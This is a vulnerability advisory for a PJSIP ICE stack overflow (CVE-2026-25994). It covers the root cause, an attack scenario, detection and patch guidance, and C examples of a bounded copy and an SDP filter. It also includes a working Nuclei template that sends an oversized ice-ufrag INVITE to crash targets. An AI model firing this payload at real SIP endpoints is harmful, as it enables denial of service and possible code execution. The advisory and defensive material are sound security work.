[webapps] PJPROJECT 2.16 - Heap Bufferoverflow

CVE-2026-25994

A stack buffer overflow in the ICE session code of PJSIP's PJNATH library, caused by a missing length check on the remote ice-ufrag, can lead to remote code execution. (The Exploit-DB title calls this a heap overflow; the root-cause analysis below describes a fixed-size buffer on the stack.)

Critical · CVSS 9.8

📋 Vulnerability overview

CVE: CVE-2026-25994
Vulnerability type: Stack buffer overflow
Affected versions: PJSIP <= 2.16
Severity: Critical · CVSS 9.8
Published: 2026-05-14
Submitted by: V.Nos - BinSmaser Team
Source: Exploit-DB (original entry)

🔬 Root cause

In pj_ice_sess_create_check_list(), a 128-byte buffer buf is declared on the stack and the remote peer's rem_ufrag is copied into it with pj_strcpy. Nothing checks the length of rem_ufrag first, so a remote ufrag longer than 128 bytes writes past the end of buf and corrupts the stack frame.
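The copy pattern described above, next to a bounded version, as an added example that is not pjproject code. str_t and mkstr are simplified stand-ins for pj_str_t and pj_cstr (pointer plus length, no NUL terminator) and are assumptions for this example, not the real PJNATH API; the 128-byte buffer size and the 520-byte PoC length are taken from this page.

```c
/* Added example, not pjproject code: the copy pattern described above, next
 * to a bounded version. str_t / mkstr are simplified stand-ins for pj_str_t
 * and pj_cstr (pointer + length, no NUL terminator); they are assumptions
 * for this example, not the real PJNATH API. */
#include <stdio.h>
#include <string.h>

typedef struct { const char *ptr; long slen; } str_t;

enum { UFRAG_BUF_LEN = 128 };          /* size of buf in the vulnerable code */

static str_t mkstr(const char *s) { str_t r = { s, (long)strlen(s) }; return r; }

/* Vulnerable shape: fixed 128-byte stack buffer, copy of a remote-controlled
 * length with no bound. With rem_ufrag.slen > 128 this smashes the stack, so
 * the callers below only ever hand it a short ufrag. */
static int create_check_list_vulnerable(str_t rem_ufrag)
{
    char buf[UFRAG_BUF_LEN];
    memcpy(buf, rem_ufrag.ptr, (size_t)rem_ufrag.slen);   /* no length check */
    return (int)rem_ufrag.slen;
}

/* Hardened shape: validate the remote length against the local buffer before
 * copying. Returns 0 on success, -1 if the ufrag is missing or does not fit
 * (one byte is reserved for the terminator). */
static int create_check_list_checked(str_t rem_ufrag, char *out, size_t out_len)
{
    if (rem_ufrag.ptr == NULL || rem_ufrag.slen < 0)
        return -1;
    if ((size_t)rem_ufrag.slen >= out_len)
        return -1;
    memcpy(out, rem_ufrag.ptr, (size_t)rem_ufrag.slen);
    out[rem_ufrag.slen] = '\0';
    return 0;
}

/* Verdict of the hardened path for an n-byte ufrag (n <= 600): 0 = accepted,
 * -1 = rejected. Used to probe the 127/128 boundary and the PoC's 520. */
static int verdict_for_len(size_t n)
{
    char in[601], out[UFRAG_BUF_LEN];
    if (n > 600) return -2;
    memset(in, 'A', n);
    in[n] = '\0';
    return create_check_list_checked(mkstr(in), out, sizeof out);
}

int main(void)
{
    /* a short ufrag is safe even on the vulnerable path */
    printf("vulnerable path, 4-byte ufrag: copied %d bytes\n",
           create_check_list_vulnerable(mkstr("8hhY")));
    printf("checked path, 127 bytes: %d\n", verdict_for_len(127));
    printf("checked path, 128 bytes: %d\n", verdict_for_len(128));
    printf("checked path, 520 bytes (PoC): %d\n", verdict_for_len(520));
    return 0;
}
```

The hardened path rejects before it copies, so the remote peer controls only whether the check list is created, never how many bytes land in the frame.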

🎯 Attack scenario

1. The attacker builds an SDP message whose a=ice-ufrag attribute carries an overlong value (for example 520 'A' characters).
2. The attacker sends a SIP INVITE carrying that SDP to the target PJSIP stack.
3. While processing the SDP the target calls pj_ice_sess_create_check_list(); the overlong rem_ufrag is copied into the 128-byte stack buffer and overwrites the return address and other data in the frame.
4. The target crashes (segmentation fault) or, with a crafted payload, the attacker achieves remote code execution.

💥 Impact

Remote code execution or denial of service (process crash).

⚔️ Nuclei exploit template

The template below is in Nuclei v3 format. Because SIP is not HTTP, it uses Nuclei's network (tcp) protocol and sends the INVITE over SIP/TCP on port 5060; a UDP-only endpoint needs the standalone PoC instead. A target that crashes returns no SIP reply, so the template matches on the absence of a response. That is an indirect signal (any non-SIP listener also stays silent) and must be confirmed on the target side.

id: CVE-2026-25994-exploit

info:
  name: PJPROJECT <=2.16 - PJNATH ICE Stack Buffer Overflow (oversized ice-ufrag)
  author: forensicanalysis
  severity: critical
  description: |
    Sends a SIP INVITE whose SDP carries an oversized a=ice-ufrag (520 'A's) and a=ice-pwd
    (150 'B's) to a PJSIP-based endpoint. In PJSIP <=2.16 the ufrag is copied into a 128-byte
    stack buffer in pj_ice_sess_create_check_list() without a length check (CVE-2026-25994),
    which crashes the process (DoS) or may allow code execution. A crashed target gives no
    SIP reply, so this template treats silence as a hit; confirm the crash on the target.
  reference:
    - https://github.com/pjsip/pjproject
    - https://github.com/VABISMO/cve-2026-25994_PJSIP
  classification:
    cve-id: CVE-2026-25994
    cvss-score: 9.8
  tags: cve,cve2026,pjsip,sip,dos

variables:
  # SDP body with CRLF line endings; ufrag/pwd lengths match the original PoC (520 / 150)
  sdp: "v=0\r\no=- 1234567890 1234567890 IN IP4 127.0.0.1\r\ns=Crash Test SDP\r\nc=IN IP4 127.0.0.1\r\nt=0 0\r\nm=audio 40000 RTP/AVP 0 101\r\na=rtpmap:0 PCMU/8000\r\na=rtpmap:101 telephone-event/8000\r\na=ice-ufrag:{{repeat('A', 520)}}\r\na=ice-pwd:{{repeat('B', 150)}}\r\na=ice-options:trickle\r\na=candidate:1 1 UDP 2130706431 127.0.0.1 40000 typ host\r\na=sendrecv\r\n"

tcp:
  - host:
      - "{{Hostname}}"
    port: 5060
    inputs:
      - data: "INVITE sip:target@{{Host}} SIP/2.0\r\nVia: SIP/2.0/TCP 127.0.0.1:15060;rport;branch=z9hG4bK{{rand_text_alpha(8)}}\r\nMax-Forwards: 70\r\nFrom: <sip:attacker@127.0.0.1>;tag=crash{{rand_text_alpha(5)}}\r\nTo: <sip:target@{{Host}}>\r\nCall-ID: crash-{{rand_text_alpha(6)}}@example.com\r\nCSeq: 1 INVITE\r\nContact: <sip:attacker@127.0.0.1:15060>\r\nContent-Type: application/sdp\r\nContent-Length: {{len(sdp)}}\r\n\r\n{{sdp}}"
    read-size: 1024
    matchers:
      # No SIP status line came back: consistent with the crash described in the
      # analysis, but also with a filtered port or a non-SIP listener. Verify manually.
      - type: word
        words:
          - "SIP/2.0"
        negative: true

🔬 Detailed technical analysis

The PoC builds an SDP containing an overlong a=ice-ufrag (520 'A's) and a=ice-pwd (150 'B's), wraps it in a SIP INVITE and sends it to the target. If the target does not respond within 4 seconds the PoC treats it as crashed, and it retries 3 times to make the trigger reliable. A timeout is only an indirect signal: a filtered port, a transport mismatch or a proxy that drops the request produce the same silence, so a suspected crash should be confirmed from the target side (process exit, core dump, supervisor restart).

🔍 Nuclei detection template

The template below only fingerprints the target: it sends a SIP OPTIONS over TCP and extracts the PJSIP/PJSUA/PJPROJECT product string from the User-Agent or Server header, which must then be compared against 2.16. A customised User-Agent gives a false negative, and a matching banner does not prove that the ICE code path is reachable.

id: CVE-2026-25994-detection

info:
  name: PJPROJECT <=2.16 - PJNATH ICE Stack Buffer Overflow (version fingerprint)
  author: forensicanalysis
  severity: medium
  description: |
    Sends a SIP OPTIONS over TCP and looks for a PJSIP/PJSUA/PJPROJECT product string in the
    reply (User-Agent or Server header). Versions <=2.16 are affected by CVE-2026-25994; compare
    the extracted version manually. Banner-based only: a customised User-Agent hides the stack,
    and a matching banner does not prove the ICE code path is reachable.
  reference:
    - https://github.com/pjsip/pjproject
    - https://github.com/VABISMO/cve-2026-25994_PJSIP
  classification:
    cve-id: CVE-2026-25994
  tags: cve,cve2026,pjsip,sip,detect

tcp:
  - host:
      - "{{Hostname}}"
    port: 5060
    inputs:
      - data: "OPTIONS sip:target@{{Host}} SIP/2.0\r\nVia: SIP/2.0/TCP 127.0.0.1:15060;rport;branch=z9hG4bK{{rand_text_alpha(8)}}\r\nMax-Forwards: 70\r\nFrom: <sip:probe@127.0.0.1>;tag=probe{{rand_text_alpha(5)}}\r\nTo: <sip:target@{{Host}}>\r\nCall-ID: probe-{{rand_text_alpha(6)}}@example.com\r\nCSeq: 1 OPTIONS\r\nContact: <sip:probe@127.0.0.1:15060>\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"
    read-size: 2048
    matchers-condition: and
    matchers:
      # any SIP reply (200 OK is not required; the product header is what matters)
      - type: word
        words:
          - "SIP/2.0"
      - type: word
        case-insensitive: true
        condition: or
        words:
          - "PJSUA"
          - "PJSIP"
          - "PJPROJECT"
    extractors:
      - type: regex
        name: product
        regex:
          - '(?i)(?:User-Agent|Server):\s*(?:PJSUA|PJSIP|PJPROJECT)[^\r\n]*'

🛡️ Remediation

Upgrade to PJSIP 2.17 or later (fix commit 063b3a1). As a temporary mitigation, have the SIP receiving side (an SBC, a proxy, or the application's own SDP pre-processing) filter out or truncate overlong ice-ufrag values before the SDP reaches the PJSIP stack. Rejecting such an offer is preferable to truncating it: a truncated ufrag no longer matches the peer's credential, so the ICE connectivity checks would fail anyway.
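The receiver-side pre-filter the mitigation calls for, as an added example that is not pjproject code. It walks an SDP body line by line and rejects any a=ice-ufrag or a=ice-pwd value outside the configured bounds before the body is handed to the ICE stack. The ufrag maximum of 128 is taken from this page's root-cause analysis (the size of the stack buffer); the lower bounds and the 256-byte password maximum are the RFC 8839 ABNF limits. The SDP built in verdict_for() is constructed for this example.

```c
/* Added example, not pjproject code: a receiver-side pre-filter for the
 * mitigation above. It walks an SDP body line by line and rejects any
 * a=ice-ufrag / a=ice-pwd value outside the configured bounds before the
 * body is handed to the ICE stack. The ufrag maximum of 128 is taken from
 * this page's root-cause analysis (the size of the stack buffer); the lower
 * bounds and the 256-byte password maximum are the RFC 8839 ABNF limits.
 * The SDP in verdict_for() is constructed for this example. */
#include <stdio.h>
#include <string.h>

enum {
    ICE_UFRAG_MIN = 4,     /* RFC 8839: ufrag = 4*256ice-char */
    ICE_UFRAG_MAX = 128,   /* tightened to the vulnerable buffer size */
    ICE_PWD_MIN   = 22,    /* RFC 8839: password = 22*256ice-char */
    ICE_PWD_MAX   = 256
};

/* Length of an attribute value starting at p, up to CR, LF or end of buffer. */
static size_t value_len(const char *p, const char *end)
{
    const char *q = p;
    while (q < end && *q != '\r' && *q != '\n')
        q++;
    return (size_t)(q - p);
}

/* Returns 0 if every ICE credential in sdp[0..len) is within bounds,
 * 1 if an ice-ufrag is out of range, 2 if an ice-pwd is out of range.
 * Tolerates CRLF and bare LF line endings; the body need not be NUL-terminated. */
static int check_ice_credentials(const char *sdp, size_t len)
{
    static const char ufrag_key[] = "a=ice-ufrag:";
    static const char pwd_key[]   = "a=ice-pwd:";
    const size_t ufrag_klen = sizeof ufrag_key - 1, pwd_klen = sizeof pwd_key - 1;
    const char *end = sdp + len;
    const char *line = sdp;

    while (line < end) {
        size_t rest = (size_t)(end - line);
        if (rest >= ufrag_klen && memcmp(line, ufrag_key, ufrag_klen) == 0) {
            size_t n = value_len(line + ufrag_klen, end);
            if (n < ICE_UFRAG_MIN || n > ICE_UFRAG_MAX)
                return 1;
        } else if (rest >= pwd_klen && memcmp(line, pwd_key, pwd_klen) == 0) {
            size_t n = value_len(line + pwd_klen, end);
            if (n < ICE_PWD_MIN || n > ICE_PWD_MAX)
                return 2;
        }
        while (line < end && *line != '\n')   /* skip to the next line */
            line++;
        if (line < end)
            line++;
    }
    return 0;
}

/* Builds a constructed SDP whose ice-ufrag is ufrag_len 'A's and whose
 * ice-pwd is pwd_len 'B's (each <= 600), then returns the filter's verdict. */
static int verdict_for(size_t ufrag_len, size_t pwd_len)
{
    static const char head[] =
        "v=0\r\no=- 1 1 IN IP4 127.0.0.1\r\ns=-\r\nc=IN IP4 127.0.0.1\r\nt=0 0\r\n"
        "m=audio 40000 RTP/AVP 0\r\na=rtpmap:0 PCMU/8000\r\na=ice-ufrag:";
    static const char mid[]  = "\r\na=ice-pwd:";
    static const char tail[] = "\r\na=candidate:1 1 UDP 2130706431 127.0.0.1 40000 typ host\r\n";
    char buf[2048];
    size_t pos = 0;

    if (ufrag_len > 600 || pwd_len > 600)
        return -1;
    memcpy(buf + pos, head, sizeof head - 1); pos += sizeof head - 1;
    memset(buf + pos, 'A', ufrag_len);        pos += ufrag_len;
    memcpy(buf + pos, mid, sizeof mid - 1);   pos += sizeof mid - 1;
    memset(buf + pos, 'B', pwd_len);          pos += pwd_len;
    memcpy(buf + pos, tail, sizeof tail - 1); pos += sizeof tail - 1;
    return check_ice_credentials(buf, pos);
}

int main(void)
{
    printf("PoC lengths 520/150: verdict %d\n", verdict_for(520, 150));
    printf("conformant 8/24:     verdict %d\n", verdict_for(8, 24));
    printf("boundary 128/24:     verdict %d\n", verdict_for(128, 24));
    printf("boundary 129/24:     verdict %d\n", verdict_for(129, 24));
    return 0;
}
```

A non-zero verdict should map to a SIP rejection of the offer (for example 488 Not Acceptable Here) rather than a silently shortened ufrag, and the filter belongs in front of the vulnerable stack, in a proxy or SBC, since the overflow happens while PJSIP itself parses the offer.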

🚨 Threat assessment

📈 EPSS exploitation probability: no data
🚨 CISA KEV: not listed as known exploited
🔧 Public PoC: none recorded (note that this page itself cites an Exploit-DB entry and the GitHub repository https://github.com/VABISMO/cve-2026-25994_PJSIP)

⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-21 08:10 | Source: Exploit-DB

[!] CONTACT_CHANNELS

For business cooperation, technical consulting or vulnerability feedback, contact the author through the following offshore node.

> PING_AUTHOR (@A1RedTeam)